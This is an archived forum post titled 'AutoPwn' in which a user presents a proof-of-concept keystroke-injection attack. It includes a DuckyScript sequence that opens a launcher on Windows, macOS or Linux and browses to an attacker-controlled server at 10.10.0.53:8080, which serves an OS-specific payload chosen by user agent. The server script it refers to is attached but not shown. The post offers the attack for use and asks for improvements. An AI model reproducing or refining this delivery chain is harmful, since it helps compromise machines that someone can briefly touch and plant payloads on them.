Jump to content

[PAYLOAD] AutoPwn

sub0

By sub0
in Payloads

Recommended Posts

sub0 Newbie

sub0

Posted
Posted

Hello,

I had an idea for a sort of cross platform attack. It is based around OS detection via the user agent in a browser. The attached file is a simple python webserver using flask to detect the user agent and serve the payload according to the targets user agent. This is only a PoC, nothing finalized at all but I think an interesting idea to play with. This could probably be deployed with the bash bunny as well. The idea is to run this duckyscript: 

DELAY 1000
ALT F2
DELAY 50
GUI SPACE
GUI r
DELAY 50
BACKSPACE
DELAY 100
STRING http://10.10.0.53:8080/
ENTER

This opens up a browser in any major OS, which will in turn download the appropriate payload to be run manually. I'm not good with windows at all, been years since I used it (I'm a total linux nerd) so my powershell payload is probably terrible. I would welcome any and all improvements, ideas, etc.

Thanks for reading!

- sub0

autopwn.py

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...